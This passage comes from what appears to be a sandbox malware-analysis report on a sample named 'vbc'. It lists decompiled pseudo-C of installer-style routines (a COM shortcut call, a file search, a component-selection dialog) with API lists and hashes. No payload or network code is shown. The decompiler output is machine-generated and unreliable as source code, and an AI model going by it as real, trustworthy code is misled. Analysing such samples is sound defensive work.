                    				_t52 =  *(_t107 - 0x20);
                    				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                    				_t101 = _t52 & 0x00008000;
                    				_t105 = _t52 >> 0x0000000c & 0x00000007;
                    				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                    				if(E00405E60( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                    					E00402DA6(0x21);
                    				}
                    				_t56 = _t107 + 8;
                    				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                    				if(_t56 < _t83) {
                    					L14:
                    					 *((intOrPtr*)(_t107 - 4)) = 1;
                    					_push(0xfffffff0);
                    				} else {
                    					_t60 =  *((intOrPtr*)(_t107 + 8));
                    					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                    					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                    					if(_t61 >= _t83) {
                    						_t64 =  *((intOrPtr*)(_t107 + 8));
                    						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                    						if(_t101 == _t83) {
                    							_t80 =  *((intOrPtr*)(_t107 + 8));
                    							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x7b4000);
                    						}
                    						if(_t105 != _t83) {
                    							_t78 =  *((intOrPtr*)(_t107 + 8));
                    							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                    						}
                    						_t66 =  *((intOrPtr*)(_t107 + 8));
                    						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                    						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                    						if( *_t91 != _t83) {
                    							_t76 =  *((intOrPtr*)(_t107 + 8));
                    							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                    						}
                    						_t68 =  *((intOrPtr*)(_t107 + 8));
                    						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                    						_t70 =  *((intOrPtr*)(_t107 + 8));
                    						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                    						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                    							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                    							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                    						}
                    						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                    						 *((intOrPtr*)( *_t72 + 8))(_t72);
                    					}
                    					_t62 =  *((intOrPtr*)(_t107 + 8));
                    					 *((intOrPtr*)( *_t62 + 8))(_t62);
                    					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                    						_push(0xfffffff4);
                    					} else {
                    						goto L14;
                    					}
                    				}
                    				E00401423();
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t107 - 4));
                    				return 0;
                    			}






















                    0x004021b3
                    0x004021bd
                    0x004021c7
                    0x004021d1
                    0x004021dc
                    0x004021df
                    0x004021f9
                    0x004021fc
                    0x00402202
                    0x00402205
                    0x0040220f
                    0x00402213
                    0x00402213
                    0x00402218
                    0x00402229
                    0x00402231
                    0x004022e8
                    0x004022e8
                    0x004022ef
                    0x00402237
                    0x00402237
                    0x00402246
                    0x0040224a
                    0x0040224d
                    0x00402253
                    0x00402261
                    0x00402264
                    0x00402266
                    0x00402271
                    0x00402271
                    0x00402276
                    0x00402278
                    0x0040227f
                    0x0040227f
                    0x00402282
                    0x0040228b
                    0x0040228e
                    0x00402294
                    0x00402296
                    0x004022a0
                    0x004022a0
                    0x004022a3
                    0x004022ac
                    0x004022af
                    0x004022b8
                    0x004022be
                    0x004022c0
                    0x004022ce
                    0x004022ce
                    0x004022d1
                    0x004022d7
                    0x004022d7
                    0x004022da
                    0x004022e0
                    0x004022e6
                    0x004022fb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004022e6
                    0x004022f1
                    0x00402c2d
                    0x00402c39

                    APIs
                    • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?), ref: 00402229
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CreateInstance
                    • String ID:
                    • API String ID: 542301482-0
                    • Opcode ID: b0b822540a1f8e9f15e50715e8c4ec56282f12879c6d9eab3f74b311f962a689
                    • Instruction ID: 703d758d197f09623ff28e3c758b152e072eb06d6e5445e6f92684eec68365f7
                    • Opcode Fuzzy Hash: b0b822540a1f8e9f15e50715e8c4ec56282f12879c6d9eab3f74b311f962a689
                    • Instruction Fuzzy Hash: 47412571A00209EFCF40DFE4C989E9D7BB5BF49344B2045AAF505EB2D1DB799981CB84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 39%
                    			E0040290B(short __ebx, short* __edi) {
                    				void* _t21;
                    
                    				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                    					E00406461( *((intOrPtr*)(_t21 - 0xc)), _t8);
                    					_push(_t21 - 0x2b0);
                    					_push(__edi);
                    					E0040651A();
                    				} else {
                    					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                    					 *__edi = __ebx;
                    					 *((intOrPtr*)(_t21 - 4)) = 1;
                    				}
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t21 - 4));
                    				return 0;
                    			}




                    0x00402923
                    0x0040293e
                    0x00402949
                    0x0040294a
                    0x00402a94
                    0x00402925
                    0x00402928
                    0x0040292b
                    0x0040292e
                    0x0040292e
                    0x00402c2d
                    0x00402c39

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID:
                    • API String ID: 1974802433-0
                    • Opcode ID: 1e85ad8e298d533372e236d13d1dc995d53f22f379fc750621e13dcefc93ed24
                    • Instruction ID: 12288428410ef0014967daf25a5ca188ca533e908051b72e28feae2455f0dfde
                    • Opcode Fuzzy Hash: 1e85ad8e298d533372e236d13d1dc995d53f22f379fc750621e13dcefc93ed24
                    • Instruction Fuzzy Hash: A6F05E71904114EED701DBA4D949AAEB378EF55318F20857BE101F21D0EBB88E119B2A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E00404EE3(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                    				struct HWND__* _v8;
                    				struct HWND__* _v12;
                    				long _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				intOrPtr _v28;
                    				signed char* _v32;
                    				int _v36;
                    				signed int _v44;
                    				int _v48;
                    				signed int* _v60;
                    				signed char* _v64;
                    				signed int _v68;
                    				long _v72;
                    				void* _v76;
                    				intOrPtr _v80;
                    				intOrPtr _v84;
                    				void* _v88;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t198;
                    				intOrPtr _t201;
                    				long _t207;
                    				signed int _t211;
                    				signed int _t222;
                    				void* _t225;
                    				void* _t226;
                    				int _t232;
                    				long _t237;
                    				long _t238;
                    				signed int _t239;
                    				signed int _t245;
                    				signed int _t247;
                    				signed char _t248;
                    				signed char _t254;
                    				void* _t258;
                    				void* _t260;
                    				signed char* _t278;
                    				signed char _t279;
                    				long _t284;
                    				struct HWND__* _t291;
                    				signed int* _t292;
                    				int _t293;
                    				long _t294;
                    				signed int _t295;
                    				void* _t297;
                    				long _t298;
                    				int _t299;
                    				signed int _t300;
                    				signed int _t303;
                    				signed int _t311;
                    				signed char* _t319;
                    				int _t324;
                    				void* _t326;
                    
                    				_t291 = _a4;
                    				_v12 = GetDlgItem(_t291, 0x3f9);
                    				_v8 = GetDlgItem(_t291, 0x408);
                    				_t326 = SendMessageW;
                    				_v24 =  *0x7a8a88;
                    				_v28 =  *0x7a8a70 + 0x94;
                    				if(_a8 != 0x110) {
                    					L23:
                    					if(_a8 != 0x405) {
                    						_t301 = _a16;
                    					} else {
                    						_a12 = 0;
                    						_t301 = 1;
                    						_a8 = 0x40f;
                    						_a16 = 1;
                    					}
                    					if(_a8 == 0x4e || _a8 == 0x413) {
                    						_v16 = _t301;
                    						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                    							if(( *0x7a8a79 & 0x00000002) != 0) {
                    								L41:
                    								if(_v16 != 0) {
                    									_t237 = _v16;
                    									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                    										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                    									}
                    									_t238 = _v16;
                    									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                    										_t301 = _v24;
                    										_t239 =  *(_t238 + 0x5c);
                    										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                    											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                    										} else {
                    											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                    										}
                    									}
                    								}
                    								goto L48;
                    							}
                    							if(_a8 == 0x413) {
                    								L33:
                    								_t301 = 0 | _a8 != 0x00000413;
                    								_t245 = E00404E31(_v8, _a8 != 0x413);
                    								_t295 = _t245;
                    								if(_t295 >= 0) {
                    									_t94 = _v24 + 8; // 0x8
                    									_t301 = _t245 * 0x818 + _t94;
                    									_t247 =  *_t301;
                    									if((_t247 & 0x00000010) == 0) {
                    										if((_t247 & 0x00000040) == 0) {
                    											_t248 = _t247 ^ 0x00000001;
                    										} else {
                    											_t254 = _t247 ^ 0x00000080;
                    											if(_t254 >= 0) {
                    												_t248 = _t254 & 0x000000fe;
                    											} else {
                    												_t248 = _t254 | 0x00000001;
                    											}
                    										}
                    										 *_t301 = _t248;
                    										E0040117D(_t295);
                    										_a12 = _t295 + 1;
                    										_a16 =  !( *0x7a8a78) >> 0x00000008 & 0x00000001;
                    										_a8 = 0x40f;
                    									}
                    								}
                    								goto L41;
                    							}
                    							_t301 = _a16;
                    							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                    								goto L41;
                    							}
                    							goto L33;
                    						} else {
                    							goto L48;
                    						}
                    					} else {
                    						L48:
                    						if(_a8 != 0x111) {
                    							L56:
                    							if(_a8 == 0x200) {
                    								SendMessageW(_v8, 0x200, 0, 0);
                    							}
                    							if(_a8 == 0x40b) {
                    								_t225 =  *0x7a1f2c;
                    								if(_t225 != 0) {
                    									ImageList_Destroy(_t225);
                    								}
                    								_t226 =  *0x7a1f40;
                    								if(_t226 != 0) {
                    									GlobalFree(_t226);
                    								}
                    								 *0x7a1f2c = 0;
                    								 *0x7a1f40 = 0;
                    								 *0x7a8ac0 = 0;
                    							}
                    							if(_a8 != 0x40f) {
                    								L90:
                    								if(_a8 == 0x420 && ( *0x7a8a79 & 0x00000001) != 0) {
                    									_t324 = (0 | _a16 == 0x00000020) << 3;
                    									ShowWindow(_v8, _t324);
                    									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                    								}
                    								goto L93;
                    							} else {
                    								E004011EF(_t301, 0, 0);
                    								_t198 = _a12;
                    								if(_t198 != 0) {
                    									if(_t198 != 0xffffffff) {
                    										_t198 = _t198 - 1;
                    									}
                    									_push(_t198);
                    									_push(8);
                    									E00404EB1();
                    								}
                    								if(_a16 == 0) {
                    									L75:
                    									E004011EF(_t301, 0, 0);
                    									_v36 =  *0x7a1f40;
                    									_t201 =  *0x7a8a88;
                    									_v64 = 0xf030;
                    									_v24 = 0;
                    									if( *0x7a8a8c <= 0) {
                    										L86:
                    										if( *0x7a8b1e == 0x400) {
                    											InvalidateRect(_v8, 0, 1);
                    										}
                    										if( *((intOrPtr*)( *0x7a7a3c + 0x10)) != 0) {
                    											E00404DEC(0x3ff, 0xfffffffb, E00404E04(5));
                    										}
                    										goto L90;
                    									}
                    									_t292 = _t201 + 8;
                    									do {
                    										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                    										if(_t207 != 0) {
                    											_t303 =  *_t292;
                    											_v72 = _t207;
                    											_v76 = 8;
                    											if((_t303 & 0x00000001) != 0) {
                    												_v76 = 9;
                    												_v60 =  &(_t292[4]);
                    												_t292[0] = _t292[0] & 0x000000fe;
                    											}
                    											if((_t303 & 0x00000040) == 0) {
                    												_t211 = (_t303 & 0x00000001) + 1;
                    												if((_t303 & 0x00000010) != 0) {
                    													_t211 = _t211 + 3;
                    												}
                    											} else {
                    												_t211 = 3;
                    											}
                    											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                    											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                    											SendMessageW(_v8, 0x113f, 0,  &_v76);
                    										}
                    										_v24 = _v24 + 1;
                    										_t292 =  &(_t292[0x206]);
                    									} while (_v24 <  *0x7a8a8c);
                    									goto L86;
                    								} else {
                    									_t293 = E004012E2( *0x7a1f40);
                    									E00401299(_t293);
                    									_t222 = 0;
                    									_t301 = 0;
                    									if(_t293 <= 0) {
                    										L74:
                    										SendMessageW(_v12, 0x14e, _t301, 0);
                    										_a16 = _t293;
                    										_a8 = 0x420;
                    										goto L75;
                    									} else {
                    										goto L71;
                    									}
                    									do {
                    										L71:
                    										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                    											_t301 = _t301 + 1;
                    										}
                    										_t222 = _t222 + 1;
                    									} while (_t222 < _t293);
                    									goto L74;
                    								}
                    							}
                    						}
                    						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                    							goto L93;
                    						} else {
                    							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                    							if(_t232 == 0xffffffff) {
                    								goto L93;
                    							}
                    							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                    							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                    								_t294 = 0x20;
                    							}
                    							E00401299(_t294);
                    							SendMessageW(_a4, 0x420, 0, _t294);
                    							_a12 = _a12 | 0xffffffff;
                    							_a16 = 0;
                    							_a8 = 0x40f;
                    							goto L56;
                    						}
                    					}
                    				} else {
                    					_v36 = 0;
                    					_v20 = 2;
                    					 *0x7a8ac0 = _t291;
                    					 *0x7a1f40 = GlobalAlloc(0x40,  *0x7a8a8c << 2);
                    					_t258 = LoadImageW( *0x7a8a60, 0x6e, 0, 0, 0, 0);
                    					 *0x7a1f34 =  *0x7a1f34 | 0xffffffff;
                    					_t297 = _t258;
                    					 *0x7a1f3c = SetWindowLongW(_v8, 0xfffffffc, E004054F0);
                    					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                    					 *0x7a1f2c = _t260;
                    					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                    					SendMessageW(_v8, 0x1109, 2,  *0x7a1f2c);
                    					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                    						SendMessageW(_v8, 0x111b, 0x10, 0);
                    					}
                    					DeleteObject(_t297);
                    					_t298 = 0;
                    					do {
                    						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                    						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                    							if(_t298 != 0x20) {
                    								_v20 = 0;
                    							}
                    							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406557(_t298, 0, _t326, 0, _t266)), _t298);
                    						}
                    						_t298 = _t298 + 1;
                    					} while (_t298 < 0x21);
                    					_t299 = _a16;
                    					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                    					_push(0x15);
                    					E00404476(_a4);
                    					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                    					_push(0x16);
                    					E00404476(_a4);
                    					_t300 = 0;
                    					_v16 = 0;
                    					if( *0x7a8a8c <= 0) {
                    						L19:
                    						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                    						goto L20;
                    					} else {
                    						_t319 = _v24 + 8;
                    						_v32 = _t319;
                    						do {
                    							_t278 =  &(_t319[0x10]);
                    							if( *_t278 != 0) {
                    								_v64 = _t278;
                    								_t279 =  *_t319;
                    								_v88 = _v16;
                    								_t311 = 0x20;
                    								_v84 = 0xffff0002;
                    								_v80 = 0xd;
                    								_v68 = _t311;
                    								_v44 = _t300;
                    								_v72 = _t279 & _t311;
                    								if((_t279 & 0x00000002) == 0) {
                    									if((_t279 & 0x00000004) == 0) {
                    										 *( *0x7a1f40 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                    									} else {
                    										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                    									}
                    								} else {
                    									_v80 = 0x4d;
                    									_v48 = 1;
                    									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                    									_v36 = 1;
                    									 *( *0x7a1f40 + _t300 * 4) = _t284;
                    									_v16 =  *( *0x7a1f40 + _t300 * 4);
                    								}
                    							}
                    							_t300 = _t300 + 1;
                    							_t319 =  &(_v32[0x818]);
                    							_v32 = _t319;
                    						} while (_t300 <  *0x7a8a8c);
                    						if(_v36 != 0) {
                    							L20:
                    							if(_v20 != 0) {
                    								E004044AB(_v8);
                    								goto L23;
                    							} else {
                    								ShowWindow(_v12, 5);
                    								E004044AB(_v12);
                    								L93:
                    								return E004044DD(_a8, _a12, _a16);
                    							}
                    						}
                    						goto L19;
                    					}
                    				}
                    			}


























































                    0x00404eea
                    0x00404f03
                    0x00404f08
                    0x00404f10
                    0x00404f16
                    0x00404f2c
                    0x00404f2f
                    0x0040515a
                    0x00405161
                    0x00405175
                    0x00405163
                    0x00405165
                    0x00405168
                    0x00405169
                    0x00405170
                    0x00405170
                    0x00405181
                    0x0040518f
                    0x00405192
                    0x004051a8
                    0x0040521d
                    0x00405220
                    0x00405222
                    0x0040522c
                    0x0040523a
                    0x0040523a
                    0x0040523c
                    0x00405246
                    0x0040524c
                    0x0040524f
                    0x00405252
                    0x0040526d
                    0x00405254
                    0x0040525e
                    0x0040525e
                    0x00405252
                    0x00405246
                    0x00000000
                    0x00405220
                    0x004051ad
                    0x004051b8
                    0x004051bd
                    0x004051c4
                    0x004051c9
                    0x004051cd
                    0x004051d8
                    0x004051d8
                    0x004051dc
                    0x004051e0
                    0x004051e4
                    0x004051f7
                    0x004051e6
                    0x004051e6
                    0x004051ed
                    0x004051f3
                    0x004051ef
                    0x004051ef
                    0x004051ef
                    0x004051ed
                    0x004051fb
                    0x004051fd
                    0x00405210
                    0x00405213
                    0x00405216
                    0x00405216
                    0x004051e0
                    0x00000000
                    0x004051cd
                    0x004051af
                    0x004051b6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405270
                    0x00405270
                    0x00405277
                    0x004052e8
                    0x004052f0
                    0x004052f8
                    0x004052f8
                    0x00405301
                    0x00405303
                    0x0040530a
                    0x0040530d
                    0x0040530d
                    0x00405313
                    0x0040531a
                    0x0040531d
                    0x0040531d
                    0x00405323
                    0x00405329
                    0x0040532f
                    0x0040532f
                    0x0040533c
                    0x0040549d
                    0x004054a4
                    0x004054c1
                    0x004054c7
                    0x004054d9
                    0x004054d9
                    0x00000000
                    0x00405342
                    0x00405344
                    0x00405349
                    0x0040534e
                    0x00405353
                    0x00405355
                    0x00405355
                    0x00405356
                    0x00405357
                    0x00405359
                    0x00405359
                    0x00405361
                    0x004053a2
                    0x004053a4
                    0x004053b4
                    0x004053b7
                    0x004053bc
                    0x004053c3
                    0x004053c6
                    0x00405468
                    0x00405471
                    0x00405479
                    0x00405479
                    0x00405487
                    0x00405498
                    0x00405498
                    0x00000000
                    0x00405487
                    0x004053cc
                    0x004053cf
                    0x004053d5
                    0x004053da
                    0x004053dc
                    0x004053de
                    0x004053e4
                    0x004053eb
                    0x004053f0
                    0x004053f7
                    0x004053fa
                    0x004053fa
                    0x00405401
                    0x0040540d
                    0x00405411
                    0x00405413
                    0x00405413
                    0x00405403
                    0x00405405
                    0x00405405
                    0x00405433
                    0x0040543f
                    0x0040544e
                    0x0040544e
                    0x00405450
                    0x00405453
                    0x0040545c
                    0x00000000
                    0x00405363
                    0x0040536e
                    0x00405371
                    0x00405376
                    0x00405378
                    0x0040537c
                    0x0040538c
                    0x00405396
                    0x00405398
                    0x0040539b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040537e
                    0x0040537e
                    0x00405384
                    0x00405386
                    0x00405386
                    0x00405387
                    0x00405388
                    0x00000000
                    0x0040537e
                    0x00405361
                    0x0040533c
                    0x0040527f
                    0x00000000
                    0x00405295
                    0x0040529f
                    0x004052a4
                    0x00000000
                    0x00000000
                    0x004052b6
                    0x004052bb
                    0x004052c7
                    0x004052c7
                    0x004052c9
                    0x004052d8
                    0x004052da
                    0x004052de
                    0x004052e1
                    0x00000000
                    0x004052e1
                    0x0040527f
                    0x00404f35
                    0x00404f3a
                    0x00404f43
                    0x00404f4a
                    0x00404f5c
                    0x00404f67
                    0x00404f6d
                    0x00404f7b
                    0x00404f8f
                    0x00404f94
                    0x00404fa1
                    0x00404fa6
                    0x00404fbc
                    0x00404fcd
                    0x00404fda
                    0x00404fda
                    0x00404fdd
                    0x00404fe3
                    0x00404fe5
                    0x00404fe8
                    0x00404fed
                    0x00404ff2
                    0x00404ff4
                    0x00404ff4
                    0x00405014
                    0x00405014
                    0x00405016
                    0x00405017
                    0x0040501c
                    0x00405022
                    0x00405026
                    0x0040502b
                    0x00405033
                    0x00405037
                    0x0040503c
                    0x00405041
                    0x00405049
                    0x0040504c
                    0x0040511c
                    0x0040512f
                    0x00000000
                    0x00405052
                    0x00405055
                    0x00405058
                    0x0040505b
                    0x0040505b
                    0x00405061
                    0x0040506a
                    0x0040506d
                    0x00405071
                    0x00405074
                    0x00405077
                    0x00405080
                    0x00405089
                    0x0040508c
                    0x0040508f
                    0x00405092
                    0x004050d0
                    0x004050fb
                    0x004050d2
                    0x004050e1
                    0x004050e1
                    0x00405094
                    0x00405097
                    0x004050a5
                    0x004050af
                    0x004050b7
                    0x004050be
                    0x004050c9
                    0x004050c9
                    0x00405092
                    0x00405101
                    0x00405102
                    0x0040510e
                    0x0040510e
                    0x0040511a
                    0x00405135
                    0x00405138
                    0x00405155
                    0x00000000
                    0x0040513a
                    0x0040513f
                    0x00405148
                    0x004054db
                    0x004054ed
                    0x004054ed
                    0x00405138
                    0x00000000
                    0x0040511a
                    0x0040504c

                    APIs
                    • GetDlgItem.USER32(?,000003F9), ref: 00404EFB
                    • GetDlgItem.USER32(?,00000408), ref: 00404F06
                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F50
                    • LoadImageW.USER32 ref: 00404F67
                    • SetWindowLongW.USER32 ref: 00404F80
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F94
                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FA6
                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404FBC
                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FC8
                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FDA
                    • DeleteObject.GDI32(00000000), ref: 00404FDD
                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405008
                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405014
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050AF
                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050DF
                      • Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F3
                    • GetWindowLongW.USER32(?,000000F0), ref: 00405121
                    • SetWindowLongW.USER32 ref: 0040512F
                    • ShowWindow.USER32(?,00000005), ref: 0040513F
                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040523A
                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040529F
                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052B4
                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052D8
                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052F8
                    • ImageList_Destroy.COMCTL32(?), ref: 0040530D
                    • GlobalFree.KERNEL32(?), ref: 0040531D
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405396
                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040543F
                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040544E
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00405479
                    • ShowWindow.USER32(?,00000000), ref: 004054C7
                    • GetDlgItem.USER32(?,000003FE), ref: 004054D2
                    • ShowWindow.USER32(00000000), ref: 004054D9
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
